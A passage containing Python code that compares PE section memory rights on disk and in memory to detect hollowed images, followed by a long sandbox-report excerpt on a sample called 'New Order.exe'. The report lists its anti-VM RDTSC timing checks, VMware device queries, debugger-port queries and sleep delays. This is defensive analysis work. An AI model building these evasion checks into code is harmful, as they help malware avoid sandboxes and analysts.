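    """E/R/W letters for the memory-protection bits, every set bit printed."""
    return ("E" if characteristics & IMAGE_SCN_MEM_EXECUTE else "") + \
           ("R" if characteristics & IMAGE_SCN_MEM_READ else "") + \
           ("W" if characteristics & IMAGE_SCN_MEM_WRITE else "")


def parse_sections(pe: bytes):
    """Yield (name, Characteristics) from each IMAGE_SECTION_HEADER."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                          # IMAGE_FILE_HEADER
    number_of_sections, = struct.unpack_from("<H", pe, coff + 2)
    size_of_optional, = struct.unpack_from("<H", pe, coff + 16)
    cursor = coff + 20 + size_of_optional        # first IMAGE_SECTION_HEADER
    for _ in range(number_of_sections):
        name, = struct.unpack_from("<8s", pe, cursor)
        characteristics, = struct.unpack_from("<I", pe, cursor + 36)
        yield name.rstrip(b"\0").decode("ascii", "replace"), characteristics
        cursor += 40


def rights_string(pe: bytes) -> str:
    """Same shape as the report's indicator: .text:ER;.rdata:R;..."""
    return "".join(f"{name}:{flags(ch)};" for name, ch in parse_sections(pe))


def changed_sections(on_disk: bytes, in_memory: bytes) -> dict:
    """Sections whose rights differ or exist on only one side: name -> (disk, memory)."""
    disk = dict(parse_sections(on_disk))
    mem = dict(parse_sections(in_memory))
    diff = {}
    for name in list(disk) + [n for n in mem if n not in disk]:
        d, m = disk.get(name), mem.get(name)
        if d != m:
            diff[name] = (None if d is None else flags(d), None if m is None else flags(m))
    return diff


def build_pe(sections, image_base: int = 0x400000) -> bytes:
    """Constructed PE32 header carrying the given (name, Characteristics) sections."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    optional = bytearray(0xE0)                   # IMAGE_OPTIONAL_HEADER32
    struct.pack_into("<H", optional, 0, 0x10B)   # Magic = PE32
    struct.pack_into("<I", optional, 28, image_base)
    file_header = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(optional), 0x0102)
    headers = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                    0x1000, 0x1000 * (i + 1), 0x1000, 0x400 * (i + 1), 0, 0, 0, 0, ch)
        for i, (name, ch) in enumerate(sections))
    return dos + b"PE\0\0" + file_header + bytes(optional) + headers


# Constructed on-disk layout: the five NSIS sections the report lists.
ON_DISK = build_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".ndata", IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".rsrc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
])
# Constructed dump of a hollowed image: one code section that is also writable.
IN_MEMORY = build_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    print("disk:  ", rights_string(ON_DISK))
    print("memory:", rights_string(IN_MEMORY))
    for name, (d, m) in changed_sections(ON_DISK, IN_MEMORY).items():
        print(f"  {name}: {d} -> {m}")
```

Run against real input, rights_string takes the raw bytes of the file and of a dump taken at the image base; any section that is missing, renamed, or newly writable in the dump is a stronger signal than the section count alone, since a packer that merely decompresses in place would keep the table and flip only the rights.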

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\New Order.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\New Order.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe | RDTSC instruction interceptor: First address: 00000000033885E4 second address: 00000000033885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe | RDTSC instruction interceptor: First address: 000000000338896E second address: 0000000003388974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\New Order.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_004088A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 3844 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 3524 | Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 0_2_00402671 FindFirstFileA,
          Source: explorer.exe, 00000003.00000000.681162732.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.660805445.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.657224309.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.660805445.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.660941932.000000000A716000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000003.00000000.653530097.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000003.00000000.681162732.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.660941932.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000003.00000000.681162732.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.661002462.000000000A782000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000003.00000000.681162732.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\New Order.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\New Order.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C7B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C00050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CB1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C67016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CB4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C12990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BEC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C04120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C04120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C12ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C12AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C74257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CAEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C9B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CB8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BF8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C2927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C03A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C24A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C0DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C923E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C923E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C923E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00BF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00CA138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C9D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C1B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C12397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C14BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C14BAD mov eax, dword ptr fs:[00000030h]
